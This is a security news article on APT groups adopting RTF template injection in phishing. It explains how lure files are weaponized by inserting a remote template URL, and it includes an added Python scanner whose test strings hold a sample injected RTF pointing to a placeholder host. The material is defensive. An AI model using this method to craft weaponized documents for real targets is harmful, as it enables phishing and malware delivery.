APT Groups Adopt New Phishing Method. Will Cybercriminals Follow?

APT actors from Russia, China, and India have been observed using the RTF-template injection technique that researchers say is poised for wider adoption.

Kelly Sheridan, Former Senior Editor, Dark Reading

December 1, 2021


APT groups from Russia, China, and India have adopted a new and easily implemented phishing method throughout the second and third quarters of this year that researchers say is poised for broader adoption among cybercriminals as well.

The Proofpoint research team observed growing adoption of the so-called RTF (rich text format)-template injection technique among APT groups from February 2021 through April 2021. While the tactic isn't necessarily new — other security researchers spotted it as early as January — today's findings mark a renewed surge of the attack technique.

RTF template injection is a technique in which an RTF file with decoy content can be changed to retrieve content hosted at an external URL when the RTF file is opened. By altering document formatting properties of an RTF file, the attacker can weaponize it to access remote content by specifying a URL resource instead of an accessible file destination, researchers wrote in a blog.

In the past, the use of embedded malicious RTF objects has been well documented as a vector for delivering malware, they noted. This technique is simpler and, in some ways, more effective for delivering remote payloads than the earlier documented methods.

"RTFs are inherently extremely flexible file types that in their file architecture accommodate a lot of objects and destination fields where a threat actor can store a malicious URL or file to retrieve a remote payload," explains Sherrod DeGrippo, vice president of threat research & detection at Proofpoint.

Further, RTF files store their properties as plaintext strings within the bytes of a file to maintain file formatting across document editors, she adds.

"This means that weaponizing a file is as simple as creating a lure file in a document editor and opening up your hex editor and replacing certain file bytes with the bytes representing a malicious URL destination," DeGrippo says.

In their writeup, researchers say it's "trivial" to alter the bytes of an RTF file to insert a template control word destination containing a URL resource. This causes the RTF file to retrieve a URL resource as its template destination rather than a local file, which is what the RTF structure intends. They note the method works in both .rtf and .doc.rtf files, enabling successful retrieval of remote payloads.

The sample RTF template injection files Proofpoint analyzed currently have a lower detection rate among public antivirus engines compared with the well-known Office-based template injection technique, DeGrippo notes.

When a victim opens the phishing attachment, they will briefly see a "contacting the server for information" message, which would not appear for a normal Word or RTF file. If the control word group was not properly bracketed, an error message may appear, but this does not happen in all cases.
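As an added defensive example (not code from Proofpoint or this article), the scanner below pulls the `{\*\template ...}` destination group defined by the RTF specification out of a file's bytes, flags a destination that is a URL rather than a file path, and reports the brace-balance problem mentioned above. The sample RTF strings and the `example.invalid` host are constructed placeholders.

```python
import re

# RTF stores control words as plain text, so a byte-level regex finds the
# template destination group: {\*\template <destination>}
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^{}]*)\}")
# A template destination that is a URL instead of a local path is the tell.
REMOTE_PREFIXES = (b"http://", b"https://", b"ftp://", b"file://")


def decode_rtf_escapes(dest: bytes) -> bytes:
    """Resolve RTF escapes inside a destination: \\'hh hex bytes and \\\\ for a literal backslash."""
    def repl(m):
        return bytes([int(m.group(1), 16)]) if m.group(1) else b"\\"
    return re.sub(rb"\\'([0-9a-fA-F]{2})|\\\\", repl, dest)


def find_template_destinations(rtf: bytes) -> list:
    """Return every decoded template destination present in the RTF bytes."""
    return [decode_rtf_escapes(m.group(1)).strip() for m in TEMPLATE_RE.finditer(rtf)]


def is_remote(dest: bytes) -> bool:
    return dest.lower().startswith(REMOTE_PREFIXES)


def scan_rtf(rtf: bytes) -> dict:
    """Summarise template destinations, remote ones, and whether braces balance."""
    dests = find_template_destinations(rtf)
    remote = [d for d in dests if is_remote(d)]
    # An unbalanced group is what produces the visible error the article describes.
    balanced = rtf.count(b"{") == rtf.count(b"}")
    return {"templates": dests, "remote": remote, "balanced": balanced,
            "suspicious": bool(remote) or not balanced}


# Constructed samples: a benign local template, an injected URL, and a badly bracketed group.
BENIGN_RTF = rb"{\rtf1\ansi{\*\template C:\\Users\\alice\\Templates\\memo.dotm}Quarterly memo}"
INJECTED_RTF = rb"{\rtf1\ansi{\*\template http://example.invalid/template.dotm}Quarterly memo}"
UNBALANCED_RTF = rb"{\rtf1\ansi{\*\template http://example.invalid/t.dotm Quarterly memo}"

if __name__ == "__main__":
    for name, sample in [("benign", BENIGN_RTF), ("injected", INJECTED_RTF), ("unbalanced", UNBALANCED_RTF)]:
        print(name, scan_rtf(sample))
```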

A New Trend Among APT Groups
Proofpoint has observed three primary variations of this tactic in the wild among APT groups, DeGrippo says, but the three groups using it abuse the core functionality in the same way.

Template injection RTF files attributable to the APT group DoNot team, suspected of alignment with Indian-state interests, were spotted through July 8, 2021. RTF files "likely attributable" to a Chinese-related APT attacker called TA423 were seen as recently as Sept. 29 and targeted organizations with links to Malaysian deep-water energy exploration, researchers noted. Other than this, they do not have information to share on targeting patterns.

Later on, they observed the APT Gamaredon, linked to the Russian Federal Security Service (FSB), using RTF template injection files in attacks that used Ukrainian government file lures on Oct. 5, 2021. This technique appeals to APT groups because it's relatively easy and stealthy.

"APT actors, despite the 'advanced' designation, if they are doing their job well will exert the least amount of resources and sophistication necessary to gain access to organizations," says DeGrippo. This prevents the attackers from exposing their sophisticated tools if they're caught, which would cause a bigger operational disruption in terms of replacing technical capabilities.

The advantage of RTF template injection is both its ease of weaponization and the reality that many organizations don't block RTF files by default, she continues. "They are part of typical business operations," she adds.

Proofpoint believes this technique has been previously used in a limited capacity by crimeware attackers. However, they say the ease of weaponization will likely attract low-sophistication attackers and ultimately drive instances of this technique in the wild. It is possible attackers will bring RTF template injection into their existing phishing toolkit as a means of increasing their success amid ongoing operations, DeGrippo says.

Fighting Against Phish
In a new report, Forrester analysts detail the characteristics of successful phishing attacks and share their advice for organizations seeking to up their defensive strategies.

"Even trained cybersecurity pros can be victimized by well-crafted phishing emails, so it's not surprising that users don't recognize every attack aimed at them," they wrote.

Their recommendations include implementing technical controls, such as email content filtering and email authentication, to protect users. Analysts also advise providing ongoing security awareness training to teach users not only how to recognize suspicious emails but also how to handle them after they're spotted. Test employees regularly and measure their performance, they advise.

Still, it's smart to plan for human error. Some emails will slip past your defenses; you can limit the impact of an attack with browser isolation technology, multifactor authentication, and a regularly reviewed incident response plan.

About the Author(s)

Kelly Sheridan

Former Senior Editor, Dark Reading

Kelly Sheridan was formerly a Staff Editor at Dark Reading, where she focused on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial services. Sheridan earned her BA in English at Villanova University. You can follow her on Twitter @kellymsheridan.
